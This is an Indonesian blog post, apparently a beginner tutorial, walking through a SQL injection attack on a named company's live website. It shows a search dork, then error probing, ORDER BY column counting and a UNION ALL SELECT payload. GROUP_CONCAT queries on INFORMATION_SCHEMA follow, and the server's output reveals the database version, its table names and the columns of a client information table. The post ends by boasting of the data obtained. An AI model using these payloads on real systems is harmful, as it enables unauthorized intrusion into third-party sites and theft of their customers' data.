injek siqil for dummies
undefined
undefined
Dork:
news.php?id= |
box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media
beri tanda petik (‘)
http://www.boxclever.ca/news.php?id=92’
muncul error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 |
box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media
tidak menampilkan eror, coba gunakan order by 6
http://www.boxclever.ca/news.php?id=...der%20by%206--
ternyata muncul error:
Unknown column '6' in 'order clause'
order by 6 site mengeluarkan error seperti Unknown column ‘6’ in 'order clause' berarti panjang column tidak sampai 6
box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media
udah ga muncul error.
Tambahkan tanda “-” didepan angka 92 dan gunakan perintah UNION+ALL+SELECT+1,2,3,4,5--
box clever ::: news ::: 3 ::: intelligent digital media
muncul angka ini:
3 1 4 |
box clever ::: news ::: 5.0.51a-log ::: intelligent digital media
muncul:
5.0.51a-log
Berarti sql Version 5
setelah mengetahui versinya ganti perintah VERSION() dengan GROUP_CONCAT(TABLE_NAME) serta berikan perintah FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA= DATABASE()-- di belakang column, perintah tersebut untuk mengetahui nama nama table pada database;)
box clever ::: news ::: client_info,contact,customersurvey,featured_projec t,news,project,project_level,project_status,projec t_type,provinces,rfp,uploads ::: intelligent digital media
muncul:
client_info,contact,customersurvey,featured_projec t,news,project,project_level,project_status,projec t_type,provinces,rfp,uploads |
box clever ::: news ::: client_id,client_name,client_street,client_city,cl ient_province,client_pc,client_notes ::: intelligent digital media
muncul:
client_id,client_name,client_street,client_city,cl ient_province,client_pc,client_notes |
I got information :)
Langganan:
Posting Komentar (Atom)
- Pindahan
- Jangan Menyerah
- Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
- Bugs di perusahaan IT
- injek siqil for dummies
- You are attempting to open a file type that is blocked by your registry policy setting
- [POC] darkMySQLi.py
- addons favorit
- APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability
- [POC] Schemafuzz.py
- Bye bye milw0rm
- [POC] Expert Advisior SQL Injection Vulnerability
- printer ngilang
- software FBI
- Utekbuntu
0 komentar:
Posting Komentar